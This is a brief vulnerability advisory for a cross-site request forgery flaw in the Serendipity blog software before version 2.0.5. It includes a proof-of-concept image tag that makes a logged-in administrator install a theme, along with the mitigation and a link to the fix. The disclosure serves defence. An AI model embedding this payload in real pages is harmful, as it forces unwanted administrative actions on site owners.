s9y Serendipity Cross Site Request Forgery
Posted on 12 April 2017
Details ====== Software: s9y Serendipity Version: <2.0.5 Homepage: https://docs.s9y.org/ ======= Description ================ Get type CSRF in Serendipity allows attacker installs any themes, no token here. POC: ======== include this in the page ,then attack will occur: <img src="http://127.0.0.1/serendipity/serendipity_admin.php?serendipity%5BadminModule%5D=templates&serendipity%5BadminAction%5D=install&serendipity%5Btheme%5D=bartleby&serendipity%5Bspartacus_fetch%5D=bartlebya> Mitigations ======= update to Serendipity v2.1.x ======== FIX: ========== https://github.com/s9y/Serendipity/issues/452 Best regards, Zhiyang Zeng of Tencent security platform department
